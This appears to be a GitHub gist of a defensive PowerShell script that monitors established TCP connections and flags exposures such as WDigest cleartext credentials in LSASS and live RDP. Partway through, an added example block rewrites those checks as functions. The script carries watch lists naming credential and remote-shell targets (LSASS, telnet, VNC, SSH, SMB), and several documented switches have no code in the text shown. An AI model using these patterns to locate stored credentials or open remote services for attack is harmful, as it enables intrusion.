@r00t-3xp10it
Last active October 18, 2025 00:29
<#
.SYNOPSIS
List Established TCP connections [For() loop]
Author: @r00t-3xp10it
Tested Under: Windows 11 (26100) x64 bits
Required Dependencies: Get-NetTCPConnection
Optional Dependencies: Netstat, ipinfo.io
PS cmdlet Dev version: v2.2.7
.DESCRIPTION
List ESTABLISHED TCP connections in loop mode by
invoking Netstat or Get-NetTCPConnection commands,
report\flush the DNS resolver cache, show Lhost GeoLocation
and scan for host exposures mapped to MITRE ATT&CK techniques
.NOTES
Executing -invoke 'netstat' together with the -process switch
displays the ProcessName associated with each TCP connection
and alerts the user of suspicious TCP connections [yellow color]
or possibly dangerous service names using the [red color]
Executing -invoke 'netstat' -process -warnmeof 'svchost'
pops up one balloon tip warning every time one TCP connection
related with the process svchost is found active on the device
Invoking -filter '127.0.0.1' deletes from scan reports every
line containing the '127.0.0.1' string (the full line is dropped).
How to use more than one filter? -filter 'svchost|127.0.0.1'
Parameter -ScanType 'manual' requires the user to press any
key on the keyboard for the next scan (bypasses -ScanEach '<secs>')
'-DLL','-DNS','-GEOLOCATION','-MITRE','-PORTSCAN' are standalone
parameters that can not be executed together with other parameters
.Parameter Invoke
List TCP connections invoking (Netstat|NetTCPConnection)
.Parameter ScanType
The type of scan [loop] to use (automatic|manual)
.Parameter ScanEach
Seconds to wait between TCP connection scans, default 6 (3|15)
.Parameter MaxScans
The max number of TCP scans to perform, default 10 (1|80)
.Parameter Filter
Delete from scan reports all lines matching this string (default 0.0.0.0:)
.Parameter LogFile
Switch that appends scans to TCPreport_HH_mm_ss_yyyy.txt
.Parameter Process
Switch to retrieve the process name associated with each TCP connection
.Parameter WarnMeOf
Pops up a balloon tip warning that the given process name was found active
.Parameter ProcessInfo
Switch that displays detailed info (description, loaded DLLs) for each connection's process
.Parameter Dns
Switch that retrieves the Lhost DNS resolver cache entries [ipv4|ipv6]
.Parameter DLL
Switch to search for DLLs loaded by running processes
.Parameter PortScan
Switch that searches for TCP high-risk [open] ports
.Parameter GeoLocation
Switch that retrieves Lhost geolocation with http://ipinfo.io
.Parameter Mitre
Switch that scans for host exposures mapped to MITRE ATT&CK techniques
.EXAMPLE
PS C:\> .\ScanTCP.ps1
List TCP connections using default settings
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke netstat
List TCP connections invoking netstat
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke NetTCPConnection -Process
List TCP connections invoking NetTCPConnection, display processname
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke netstat -Process
List TCP connections invoking netstat, display processname
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke netstat -Process -warnmeof 'svchost'
Pops up one balloon tip warning every time one TCP connection
related with the process svchost is found active on the device
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke NetTCPConnection -LogFile
List TCP connections invoking NetTCPConnection and append scan results to logfile
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke Netstat -MaxScans 6 -ScanEach 2 -filter '127.0.0.1'
List TCP connections invoking Netstat command, scan 6 times max with 2 seconds delay
and delete from scan reports all strings with '127.0.0.1' characters [full line]
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke NetTCPConnection -MaxScans 3 -ScanType manual
List TCP connections invoking NetTCPConnection, scan 3 times, (press keyboard key for new scan)
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -invoke 'Netstat' -process -warnmeof 'SVCHOST' -scaneach '10' -maxscans '80'
Execute the netstat command to scan for active TCP connections, display the process name associated with
each TCP connection, trigger balloon tip warnings when the SVCHOST process is found active, wait 10 seconds
before running the next TCP connection scan, and repeat all the steps described a maximum of 80 times
.INPUTS
None. You cannot pipe objects into ScanTCP.ps1
.OUTPUTS
(
* ) ( )\ )
) /( )\ (()/( )
( )(_))(((_) /(_)) ( ( ( /( (
(_(_()) )\___ (_)) )\ )\ )(_)) )\ )
|_ _|((/ __|| _ \ ((_) ((_)((_)_ _(_/(
| | | (__ | _/ (_-</ _| / _ || ' \))
|_| \___||_| /__/\__| \__,_||_||_|
List ESTABLISHED 192.168.1.5 TCP Connections
Name Status LinkSpeed ifDesc
---- ------ --------- ------
Wi-Fi Up 286.8 Mbps MediaTek Wi-Fi 6 MT7921 Wireless LAN Card
Ethernet Disconnected 0 bps Realtek PCIe GbE Family Controller
TCP State LocalAddress LocalPort RemoteAddress RemotePort HostName ProcessName OwningProcess
--------- ------------ --------- ------------- ---------- -------- ----------- -------------
Established 192.168.1.5 62082 140.82.113.26 443 lb-140-82-113-26-iad.github.com opera 776
Established 127.0.0.1 60919 127.0.0.1 58995 Skynet AcerGAICameraW 6880
Established 127.0.0.1 60904 127.0.0.1 5141 Skynet AQAUserPS 3404
Established 127.0.0.1 58995 127.0.0.1 60919 Skynet AcerPixyService 4548
Established 127.0.0.1 49673 127.0.0.1 49672 Skynet AcerSysMonitorService 8560
Established 127.0.0.1 49672 127.0.0.1 49673 Skynet AcerSysMonitorService 8560
Established 127.0.0.1 49670 127.0.0.1 49669 Skynet ADESv2Svc 4508
Established 127.0.0.1 49669 127.0.0.1 49670 Skynet ADESv2Svc 4508
Established 192.168.1.5 49412 4.207.247.139 443 svchost 4964
Established 127.0.0.1 5141 127.0.0.1 60904 Skynet AcerQAAgent 4576
-|Scan[7:20]|-
.LINK
https://github.com/r00t-3xp10it/redpill
https://github.com/r00t-3xp10it/meterpeter
#>
[CmdletBinding(PositionalBinding=$false)] param(
[string]$Invoke="NetTCPConnection",
[string]$ScanType="automatic",
[string]$Filter="0.0.0.0:",
[string]$WarnMeOf="NULL",
[switch]$ProcessInfo,
[switch]$GeoLocation,
[int]$MaxScans=10,
[int]$ScanEach=6,
[switch]$PortScan,
[switch]$Process,
[switch]$Logfile,
[switch]$Mitre,
[switch]$DLL,
[switch]$Dns
)
$StartBanner = @"
(
* ) ( )\ )
` ) /( )\ (()/( )
( )(_))(((_) /(_)) ( ( ( /( (
(_(_()) )\___ (_)) )\ )\ )(_)) )\ )
|_ _|((/ __|| _ \ ((_) ((_)((_)_ _(_/(
| | | (__ | _/ (_-</ _| / _` || ' \))
|_| \___||_| /__/\__| \__,_||_||_|
"@;
$CmdletVersion = "v2.2.7"
# Script local Variable declarations
# IsInRole checks the effective token: under UAC a non-elevated prompt still lists
# S-1-5-32-544 in its groups (deny-only), so a plain SID match would report admin
$IsClientAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
$LogName = "TCPreport_$(Get-Date -Format 'HH_mm_ss_yyyy').txt"
$host.UI.RawUI.WindowTitle = "@ScanTCP > [ $CmdletVersion ]"
# First non-loopback, non-APIPA IPv4 address (parsing ipconfig text is locale-dependent)
$IP = (Get-NetIPAddress -AddressFamily IPv4|Where-Object {$_.IPAddress -NotMatch '^(127\.|169\.254\.)'}|Select-Object -First 1).IPAddress
$ErrorActionPreference = "SilentlyContinue"
$WarnMeOf = $WarnMeOf.ToUpper()
$Backuup = $MaxScans
# Lack of Administrator privileges remark
If((-not $IsClientAdmin) -and ($ProcessInfo.IsPresent))
{
# Popup is called in-process; no child powershell.exe is needed
(New-Object -ComObject Wscript.Shell).Popup("Some tasks require admin privileges`nto extract info from services\processes",7,"ScanTCP - $CmdletVersion - ADMIN PRIVILEGES REMARK",0+64)|Out-Null
}
# make sure the correct scan mode is selected
If($Invoke -iNotMatch "^(netstat|NetTCPConnection)$")
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] Wrong " -NoNewline
Write-Host "-invoke '$Invoke'" -ForegroundColor Red -NoNewline
Write-Host " input, defaulting to " -NoNewline
Write-Host "NetTCPConnection" -ForegroundColor Green
$Invoke = "NetTCPConnection"
}
# make sure the correct Loop mode is selected
If($ScanType -iNotMatch "^(automatic|manual)$")
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] wrong " -NoNewline
Write-Host "-scantype '$scantype'" -ForegroundColor Red -NoNewline
Write-Host " input, defaulting to " -NoNewline
Write-Host "automatic" -ForegroundColor Green -NoNewline
Write-Host " scans"
$ScanType = "Automatic"
}
## Min|Max number of scans permitted
If($MaxScans -lt 1 -or $MaxScans -gt 80)
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] Non optimal " -NoNewline
Write-Host "-maxscans '$MaxScans'" -ForegroundColor Red -NoNewline
Write-Host " setting detected. Default is " -NoNewline
Write-Host "10" -ForegroundColor Green -NoNewline
Write-Host " scans."
Write-Host "[" -NoNewline
Write-Host "?" -ForegroundColor Yellow -NoNewline
$BypassMax = Read-Host "] Use the recommended default setting? (yes|no)"
If($BypassMax -iMatch "^(y|yes)$")
{
$Backuup = $MaxScans = 10
}
}
# Make sure the correct timing is set
If($ScanEach -lt 3 -or $ScanEach -gt 15)
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] Non optimal " -NoNewline
Write-Host "-scaneach '$ScanEach'" -ForegroundColor Red -NoNewline
If($ScanEach -gt 15)
{
$ScanEach = "15"
}
ElseIf(($ScanEach -lt 3) -and ($WarnMeOf -iNotMatch "^(NULL)$"))
{
$ScanEach = "4"
}
ElseIf($ScanEach -lt 3)
{
$ScanEach = "3"
}
Write-Host " Setting, defaulting to " -NoNewline
Write-Host "$ScanEach" -ForegroundColor Green -NoNewline
Write-Host " seconds"
}
# module load incompatibility warnings
If(($GeoLocation.IsPresent) -and ($Logfile.IsPresent))
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "logfile" -ForegroundColor Red -NoNewline
Write-Host " creation is not available in the " -NoNewline
Write-Host "-geolocation" -ForegroundColor Red -NoNewline
Write-Host " module"
}
If(($Mitre.IsPresent) -and ($Logfile.IsPresent))
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "logfile" -ForegroundColor Red -NoNewline
Write-Host " creation is not available in the " -NoNewline
Write-Host "-mitre" -ForegroundColor Red -NoNewline
Write-Host " module"
}
If(-not($Process.IsPresent) -and ($WarnMeOf -iNotMatch "^(NULL)$"))
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "-warnmeof '$WarnMeOf'" -ForegroundColor Red -NoNewline
Write-Host " requires the " -NoNewline
Write-Host "-process" -ForegroundColor Red -NoNewline
Write-Host " switch to be invoked together with it"
}
If(-not($Process.IsPresent) -and ($ProcessInfo.IsPresent))
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "-ProcessInfo" -ForegroundColor Red -NoNewline
Write-Host " requires the " -NoNewline
Write-Host "-process" -ForegroundColor Red -NoNewline
Write-Host " switch to be invoked together with it"
}
function Invoke-BallonTip()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - pops up one ballontip warning
.NOTES
pops up one ballontip in the end of each scan
#>
Add-Type -AssemblyName System.Windows.Forms
$balmsg = New-Object System.Windows.Forms.NotifyIcon
$path = (Get-Process -id $pid).Path
$balmsg.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($path)
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Info
$balmsg.BalloonTipText = "Scans finished - $(Get-Date -Format g)"
$balmsg.BalloonTipTitle = "ScanTCP - $CmdletVersion - $CmdLetAppl"
$balmsg.Visible = $true
$balmsg.ShowBalloonTip(10000)
}
function Invoke-BallonTipWarnings()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - pops up one balloon tip warning [Netstat|NetTCPConnection]
.NOTES
Pops up one balloon tip warning that one TCP connection
related with the process name was found active on the device.
Reads $ProcName, $ProcPPID and $LocalPor from the calling scan loop.
#>
$SuspiciousDB = @(
"$WarnMeOf","NETBIOS","TELNET","LDAPS","IMAPS","MSTSC","LSASS","RDP","SMB","SSH","SSL","VNC","SYSTEM"
)
ForEach($NameToken in $SuspiciousDB)
{
If($ProcName -iMatch "$NameToken") ## [Netstat|NetTCPConnection]$ProcessName = $SuspiciousDB(item) ?
{
# Counter is reset per token so every matching token gets its own message text
[int]$Contador = 0
$pathId = (Get-Process -id $pid).Path
# SuspiciousDB(item) found -> BalloonTip
Add-Type -AssemblyName System.Windows.Forms
$balmsg = New-Object System.Windows.Forms.NotifyIcon
$balmsg.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($pathId)
If($NameToken -iMatch "SVCHOST") ## Scan for exposure to MITRE T1021 (Remote Services)
{
## SVCHOST process found by -WarnMeOf 'SVCHOST' --> Scanning for rdpcorets.dll load
# Note: SVCHOST is not in the default $SuspiciousDB list; it only enters through -WarnMeOf
# Test: Process_Id: 24288 DLLs: ntdll.dll [loaded by 24288] OR rdpcorets.dll [real finding]
# Enumerating svchost modules needs an elevated prompt; unelevated, $PPID stays empty
$PPID = (Get-Process -Name "SVCHOST" | Where-Object {
$_.Id -eq $ProcPPID -and $_.Responding -and $_.Modules.ModuleName -iMatch "^rdpcorets\.dll$"}
).Id # <-- PID of the svchost instance that loaded the DLL
# Make sure termservice (RDP) service is running
# Test: AcerPixyService [running] OR termservice [real finding]
$RDPservice = [bool]((Get-Service -Name "termservice" -EA SilentlyContinue).Status -ieq "Running")
# Requires rdpcorets.dll loaded by this SVCHOST process and TermService
# running to flag the host as reachable through Remote Desktop (T1021)
If(($PPID -Match '^\d+$') -and $RDPservice) ## SVCHOST::Detection Rule [1]
{
# TermService [Mitre T1021] exposure BalloonTip warning
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Error
$balmsg.BalloonTipText = "DLL RDPCORETS.dll was loaded by SVCHOST PID: $PPID on Port: $LocalPor Exposure: TermService [Mitre T1021]"
$Contador++
}
}
## Detection rules of other $SuspiciousDB(items)
If($NameToken -iMatch "LSASS") ## LSASS::Detection Rule [2]
{
# UseLogonCredential=1 makes WDigest keep cleartext passwords in LSASS memory
If((Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest').UseLogonCredential -eq 1)
{
# LSASS with stored credentials connecting to TCP [danger]
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Error
$balmsg.BalloonTipText = "$NameToken with stored credentials connecting to TCP on Port: $LocalPor Exposure: LSASS Leak [Mitre T1003]"
$Contador++
}
}
# Grouped explicitly: without the parentheses -and binds tighter than -or,
# and any token on port 445 or 5985 would have fired this rule
If(($NameToken -iMatch "RDP") -and ($LocalPor -in @(3389,445,5985))) ## RDP::Detection Rule [3]
{
# RDP connecting to TCP Local Ports: 3389|445|5985
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Error
$balmsg.BalloonTipText = "$NameToken process name found connecting to TCP on LocalPort: $LocalPor"
$Contador++
}
If(($NameToken -iMatch "SSH") -and ($LocalPor -eq 22)) ## SSH::Detection Rule [4]
{
If(Test-Path -Path "$Env:PROGRAMDATA\ssh\sshd_config")
{
# SSH connecting to TCP Local Port: 22 with an OpenSSH server config present
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Error
$balmsg.BalloonTipText = "$NameToken process name found connecting to TCP on LocalPort: $LocalPor config_file_in: $Env:PROGRAMDATA\ssh\sshd_config"
$Contador++
}
}
If($Contador -eq 0)
{
## [Netstat|NetTCPConnection]$ProcessName = $SuspiciousDB(item)
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Warning
$balmsg.BalloonTipText = "$NameToken process name found connecting to TCP on LocalPort: $LocalPor"
}
# Execute BalloonTip
$balmsg.BalloonTipTitle = "ScanTCP - $CmdletVersion - $CmdLetAppl"
$balmsg.Visible = $true
$balmsg.ShowBalloonTip(100)
# Time for BalloonTip to close
Start-Sleep -Milliseconds 1800
}
}
}
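The host-state checks behind the balloon tip rules above (WDigest cleartext credentials, TermService plus rdpcorets.dll in svchost, and the remote-service port rule), as an added example that is not part of the gist: each check returns an object with an `Exposed` flag and the ATT&CK technique it maps to, so the result can be logged or asserted on instead of only shown in a notification. The function names (`Test-WDigestCleartext`, `Test-TermServiceExposure`, `Test-SuspiciousLocalPort`, `Invoke-HostExposureChecks`) and the default token list are this example's own; the port rule is written with explicit grouping so the port test cannot fire on its own.

```powershell
function Test-WDigestCleartext {
    # Rule [2]: UseLogonCredential = 1 makes WDigest keep cleartext passwords in
    # LSASS memory (OS Credential Dumping, ATT&CK T1003). An absent value means the
    # default, which is 'disabled' on Windows 8.1 / Server 2012 R2 and later.
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $value = (Get-ItemProperty -Path $key -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    if ($null -eq $value) { $detail = 'not set (default: disabled)' } else { $detail = "value=$value" }
    [pscustomobject]@{
        Check    = 'WDigest UseLogonCredential'
        Detail   = $detail
        Exposed  = ($value -eq 1)
        AttackId = 'T1003'
    }
}

function Test-TermServiceExposure {
    # Rule [1]: TermService running AND an svchost instance with rdpcorets.dll mapped
    # means Remote Desktop is live on this host (Remote Services, ATT&CK T1021).
    # Module enumeration of svchost needs an elevated prompt; unelevated, the PID list is empty.
    $svc     = Get-Service -Name TermService -ErrorAction SilentlyContinue
    $running = ($null -ne $svc -and $svc.Status -eq 'Running')
    $rdpPids = @(foreach ($p in Get-Process -Name svchost -ErrorAction SilentlyContinue) {
        try { if ($p.Modules.ModuleName -contains 'rdpcorets.dll') { $p.Id } } catch { }  # access denied: skip
    })
    [pscustomobject]@{
        Check    = 'TermService running + rdpcorets.dll in svchost'
        Detail   = "TermService running=$running; svchost PIDs with rdpcorets.dll: $($rdpPids -join ',')"
        Exposed  = ($running -and $rdpPids.Count -gt 0)
        AttackId = 'T1021'
    }
}

function Test-SuspiciousLocalPort {
    # Rule [3], grouped explicitly: a watch-list token must match the process name
    # AND the local port must be a remote-service port (RDP 3389, SMB 445, WinRM 5985).
    # Neither half fires on its own. Token list is an assumption of this example.
    param(
        [Parameter(Mandatory)][string]$ProcessName,
        [Parameter(Mandatory)][int]$LocalPort,
        [string[]]$Tokens = @('RDP', 'MSTSC', 'SMB', 'LSASS')
    )
    $remoteServicePorts = @(3389, 445, 5985)
    $hit = @($Tokens | Where-Object { $ProcessName -imatch $_ })
    if ($hit.Count -gt 0) { $detail = "token=$($hit[0])" } else { $detail = 'no watch-list token matched' }
    [pscustomobject]@{
        Check    = "'$ProcessName' on local port $LocalPort"
        Detail   = $detail
        Exposed  = ($hit.Count -gt 0 -and $remoteServicePorts -contains $LocalPort)
        AttackId = 'T1021'
    }
}

function Invoke-HostExposureChecks {
    # Host-wide checks run once per scan rather than once per connection
    @(Test-WDigestCleartext; Test-TermServiceExposure)
}

# Host checks against the local machine, then the port rule on constructed input
Invoke-HostExposureChecks | Format-Table Check, Exposed, AttackId, Detail -AutoSize
Test-SuspiciousLocalPort -ProcessName 'svchost' -LocalPort 445    # no token match: not exposed
Test-SuspiciousLocalPort -ProcessName 'mstsc'   -LocalPort 3389   # MSTSC token + 3389: exposed
```

Run it from an elevated prompt if the svchost module check matters; from a standard prompt `Test-TermServiceExposure` reports the service state but an empty PID list, which the `Detail` field makes visible rather than silently reporting "not exposed".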
function Invoke-ScheduleTasks()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Prints pending [Today:Hour] schedule tasks
.NOTES
This function only prints schedule tasks if task is
in 'Ready' state and with [todays::Hour] timestamps
.OUTPUTS
TaskName State NextRunTime Execute
-------- ----- ----------- -------
Office Actions Server Ready 14/10/2025 21:00:00 C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Share...
Microsoft Compatibility Appraiser Ready 14/10/2025 21:31:07 %windir%\system32\sc.exe
Data Integrity Check And Scan Ready 14/10/2025 21:35:52
QueueReporting Ready 14/10/2025 21:09:51 %windir%\system32\wermgr.exe
#>
## Print only tasks scheduled with [today::hour] timestamps
# NextRunTime is compared as a DateTime (same date and hour as now) rather than
# as a culture-formatted string, so the filter does not depend on the locale's date layout
$Now = Get-Date
$StoreData = Get-ScheduledTask|Select-Object TaskName,State,@{Name='NextRunTime';Expression={($_|Get-ScheduledTaskInfo).NextRunTime}},@{Name='Execute';Expression={$_.Actions.Execute}}|
Where-Object{$_.State -Match "Ready" -and $_.TaskName -iNotMatch 'OneDrive' -and $_.NextRunTime -is [DateTime] -and $_.NextRunTime.Date -eq $Now.Date -and $_.NextRunTime.Hour -eq $Now.Hour}
# No tasks with [today::hour] found
If(-not $StoreData)
{
Write-Host "[" -NoNewline
Write-Host "x" -ForegroundColor Red -NoNewline
Write-Host "] ERROR: " -NoNewline
Write-Host "No tasks scheduled for " -ForegroundColor Red -NoNewline
Write-Host "$(Get-Date -Format 'dd/MM/yyyy')" -ForegroundColor Blue -NoNewline
Write-Host " in the current " -ForegroundColor Red -NoNewline
Write-Host "hour" -ForegroundColor Blue -NoNewline
Write-Host " found.`n`n" -ForegroundColor Red
return
}
# Print [today::hour] schedule tasks found OnScreen
$StoreData|Format-Table -AutoSize|Out-String -Stream|select -skip 1|ForEach-Object {
$stringformat = If($_ -iMatch "^(--------)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "C:\\Users\\$Env:USERNAME")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -Match '%\w*')
{
@{ 'ForegroundColor' = 'Gray' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
function Invoke-ProcessTCPwarnings()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Use NETSTAT command to list established TCP connections
.NOTES
The -invoke 'netstat' together with the -process switch will
display the Process Name associated with each TCP connection
and alert the user of suspicious TCP connections (yellow color)
and possibly exploitable service names using the (red color)
Parameters -invoke 'netstat' -process -warnmeof 'svchost'
pop up one balloon tip warning that one TCP connection
related with process svchost was found active on the device
Invoking -filter '127.0.0.1' will delete from the scan report
every line containing the '127.0.0.1' string
.OUTPUTS
Name Status LinkSpeed ifDesc
---- ------ --------- ------
Wi-Fi Up 286.8 Mbps MediaTek Wi-Fi 6 MT7921 Wireless LAN Card
Ethernet Disconnected 0 bps Realtek PCIe GbE Family Controller
Proto State LocalAddress LocalPort RemoteAddress RemotePort ProcessName OwningProcess
----- ----- ------------ --------- ------------- ---------- ----------- -------------
TCP Established 127.0.0.1 5141 127.0.0.1 58600 AcerQAAgent 4296
TCP Established 127.0.0.1 49669 127.0.0.1 49670 ADESv2Svc 4216
TCP Established 127.0.0.1 49670 127.0.0.1 49669 ADESv2Svc 4216
TCP Established 127.0.0.1 49672 127.0.0.1 49673 AcerSysMonitorService 8120
TCP Established 127.0.0.1 49673 127.0.0.1 49672 AcerSysMonitorService 8120
TCP Established 127.0.0.1 58600 127.0.0.1 5141 AQAUserPS 24772
TCP Established 127.0.0.1 58641 127.0.0.1 58995 AcerGAICameraW 25144
TCP Established 127.0.0.1 58995 127.0.0.1 58641 AcerPixyService 16616
TCP Established 192.168.1.5 49457 4.207.247.137 443 svchost 4804
TCP Established 192.168.1.5 63677 185.199.110.133 443 opera 16944
TCP Established 192.168.1.5 63678 185.199.108.154 443 opera 16944
TCP Established 192.168.1.5 63692 140.82.113.25 443 opera 16944
TCP Established 192.168.1.5 63659 52.123.129.14 443 MpDefenderCoreService 22416
#>
$CmdLetAppl = "Netstat"
# Build the connections list. IPv6 rows ('[::1]:port') are dropped because the
# address:port split below assumes IPv4; -Filter is applied as a regex so that
# alternatives such as '127\.0\.0\.1|192\.168\.' work (findstr takes '|' literally)
$TcpList = netstat -ano|Where-Object {$_ -Match "ESTABLISHED" -and $_ -NotMatch '\[' -and $_ -iNotMatch $Filter}
Get-NetAdapter|Select-Object Name,Status,LinkSpeed,ifDesc|
Format-Table -AutoSize|Out-String -Stream|Select-Object -skip 1
# TCP TABLE
$TCPtable = New-Object System.Data.DataTable
$TCPtable.Columns.Add("Proto")|Out-Null
$TCPtable.Columns.Add("State")|Out-Null
$TCPtable.Columns.Add("LocalAddress")|Out-Null
$TCPtable.Columns.Add("LocalPort")|Out-Null
$TCPtable.Columns.Add("RemoteAddress")|Out-Null
$TCPtable.Columns.Add("RemotePort")|Out-Null
$TCPtable.Columns.Add("ProcessName")|Out-Null
$TCPtable.Columns.Add("OwningProcess")|Out-Null
# PROCESSES INFO TABLE
$Proctable = New-Object System.Data.DataTable
$Proctable.Columns.Add("ProcessName")|Out-Null
$Proctable.Columns.Add("Description")|Out-Null
$Proctable.Columns.Add("DLLs Loaded")|Out-Null
ForEach($Item in $TcpList)
{
## Loop through all $TcpList items to build the table
# Split the line on whitespace, then drop the empty tokens
$ParsingData = $Item.split()
$RawData = $ParsingData|?{$_.trim() -ne ""}
$Protocol = $RawData[0] ## Protocol
$AddrPort = $RawData[1] ## LocalAddress + port
$LocalHos = $AddrPort.Split(':')[0] ## LocalAddress
$LocalPor = $AddrPort.Split(':')[1] ## LocalPort
$ProcPPID = $RawData[-1] ## Process PID
$Remoteal = $RawData[2] ## RemoteAddress + port
$Remotead = $Remoteal.Split(':')[0] ## RemoteAddress
$Remotepo = $Remoteal.Split(':')[1] ## RemotePort
$ProcName = (Get-Process -Id "$ProcPPID").ProcessName
## Adding values to output DataTable! Protocol - Established
$TCPtable.Rows.Add("$Protocol", ## Protocol
"Established", ## State
"$LocalHos", ## LocalAddress
"$LocalPor", ## LocalPort
"$Remotead", ## RemoteAddress
"$Remotepo", ## RemotePort
"$ProcName", ## ProcessName
"$ProcPPID" ## OwningProcess
)|Out-Null
# Balloon tip warning function
If($WarnMeOf -iNotMatch "^(NULL)$")
{
# Trigger a balloon tip warning when the process name is on the watch list
If($ProcName -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
Invoke-BallonTipWarnings
}
}
# ProcessName Information
If($ProcessInfo.IsPresent)
{
<#
.OUTPUTS
ProcessName Description DLLs Loaded
----------- ----------- -----------
opera Opera GX Internet Browser opera.exe ntdll.dll KERNEL32.DLL KERNELBASE.dll opera_elf.dll bcryptprimitives.dll opera_bro...
AQAUserPS
AcerPixyService
AcerGAICameraW Acer GAI Camera Windows AcerGAICameraW.exe ntdll.dll KERNEL32.DLL KERNELBASE.dll USER32.dll win32u.dll WINHTTP.dll A...
AcerSysMonitorService
AcerSysMonitorService
ADESv2Svc
ADESv2Svc
svchost
AcerQAAgent
#>
$ProcObj = Get-Process -Id $ProcPPID
$ProcNa = $ProcObj.Name
$ProcDe = $ProcObj.Description
$DLLSLoaded = $ProcObj.Modules.ModuleName # empty for protected/system processes unless elevated
## Adding values to output DataTable!
$Proctable.Rows.Add("$ProcNa", ## name
"$ProcDe", ## description
"$DLLSLoaded" ## DLLS LOADED
)|Out-Null
}
}## End of ForEach()
## Display scan results OnScreen (colorize output)
# Process names frequently abused or impersonated by malware are flagged yellow,
# watch-list names from $SuspiciousDB and -WarnMeOf red, Defender components green,
# loopback rows gray
$TCPtable|Format-Table -AutoSize|Out-String -Stream|select -skip 1|ForEach-Object {
$stringformat = If($_ -iMatch "(ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
@{ 'ForegroundColor' = 'Red' }
}
ElseIf($_ -iMatch "(MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService)")
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match '\s+127.0.0.1\s+')
{
@{ 'ForegroundColor' = 'Gray' }
}
ElseIf($_ -Match "^(-----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
# ProcessInfo TABLE output
If($ProcessInfo.IsPresent)
{
Start-Sleep -Milliseconds 1400
#echo $Proctable|Format-Table -AutoSize|Out-String -Stream|Select-Object -skip 1
$Proctable|Format-Table -AutoSize|Out-String -Stream|select -skip 1|ForEach-Object {
$stringformat = If($_ -iMatch "(ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
@{ 'ForegroundColor' = 'Red' }
}
ElseIf($_ -iMatch "(MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService)")
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match "^(-----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
## Invoke schedule tasks
Invoke-ScheduleTasks
}
# Append to logfile ?
If($Logfile.IsPresent)
{
$TCPtable|Format-Table -AutoSize|Out-File -FilePath $LogName -Append
If($ProcessInfo.IsPresent)
{
$Proctable|Format-Table -AutoSize|Out-File -FilePath $LogName -Append
}
}
}
